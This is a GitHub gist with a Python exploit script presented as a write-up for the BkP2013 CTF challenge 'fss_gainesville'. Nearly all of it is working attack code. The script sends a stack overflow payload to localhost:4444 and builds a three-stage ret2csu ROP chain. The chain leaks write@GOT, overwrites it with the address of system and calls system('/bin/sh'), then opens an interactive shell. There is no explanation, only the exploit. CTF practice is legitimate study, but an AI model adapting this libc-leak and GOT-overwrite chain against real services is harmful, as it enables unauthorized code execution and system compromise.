Last active
August 29, 2015 14:23
-
-
Save otms61/5eb0c8877f4c8b2fc57a to your computer and use it in GitHub Desktop.
write up for BkP2013 fss_gainesville
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| import socket | |
| import struct | |
| import telnetlib | |
| from time import sleep | |
| def sock(remoteip, remoteport): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((remoteip, remoteport)) | |
| f = s.makefile('rw', bufsize=0) | |
| return s, f | |
| def read_until(f, delim='\n'): | |
| data = '' | |
| while not data.endswith(delim): | |
| data += f.read(1) | |
| return data | |
| def p(a): | |
| return struct.pack("<Q", a) | |
| def u(a): | |
| return struct.unpack("<Q", a)[0] | |
| def shell(s): | |
| t = telnetlib.Telnet() | |
| t.sock = s | |
| t.interact() | |
| libc_write_offset = 0xeb860 | |
| libc_system_offset = 0x46640 | |
| puts_plt = 0x400740 | |
| csu_gadget1 = 0x401896 | |
| csu_gadget2 = 0x401880 | |
| write_got = 0x602218 | |
| read_got = 0x602238 | |
| binsh = '/bin/sh\x00' | |
| s, f = sock('localhost', 4444) | |
| s.send('5\n') | |
| payload = 'UA /OV OKC /TM 1522 /FL 080 /TP CE172 / SK020BKN' | |
| payload += 'a'*104 | |
| # stage 1 gadgets to leak write address | |
| payload += p(csu_gadget1) | |
| payload += p(0xdeadbeaf) | |
| payload += p(0) # rbx | |
| payload += p(1) # rbp | |
| payload += p(write_got) # r12 | |
| payload += p(8) # r13 = rdx = arg3 | |
| payload += p(write_got) # r14 = rsi = arg2 | |
| payload += p(0) # r15 = edi = arg1 | |
| payload += p(csu_gadget2) # rbp | |
| # stage 2 gadgets to overwirte write address by system address | |
| payload += p(0xdeadbeaf) | |
| payload += p(0) # rbx | |
| payload += p(1) # rbp | |
| payload += p(read_got) # r12 | |
| payload += p(16) # r13 = rdx = arg3 | |
| payload += p(write_got) # r14 = rsi = arg2 | |
| payload += p(0) # r15 = edi = arg1 | |
| payload += p(csu_gadget2) # rbp | |
| # stage 3 gadgets to call system("/bin/sh") | |
| payload += p(0xdeadbeaf) | |
| payload += p(0) # rbx | |
| payload += p(1) # rbp | |
| payload += p(write_got) # r12 write_got changed to system addr | |
| payload += p(0) # r13 = rdx = arg3 | |
| payload += p(0) # r14 = rsi = arg2 | |
| payload += p(write_got+0x8) # r15 = edi = arg1 | |
| payload += p(csu_gadget2) # rbp | |
| sleep(0.1) | |
| s.send(payload+'\n') | |
| read_until(f, 'PIREP is now on file\n') | |
| libc_write = u(s.recv(8)) | |
| libc_base = libc_write - libc_write_offset | |
| libc_system = libc_base + libc_system_offset | |
| print '[*] libc base: {}'.format(hex(libc_base)) | |
| print '[*] libc write: {}'.format(hex(libc_write)) | |
| print '[*] libc system: {}'.format(hex(libc_system)) | |
| s.send(p(libc_system)+binsh) | |
| shell(s) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment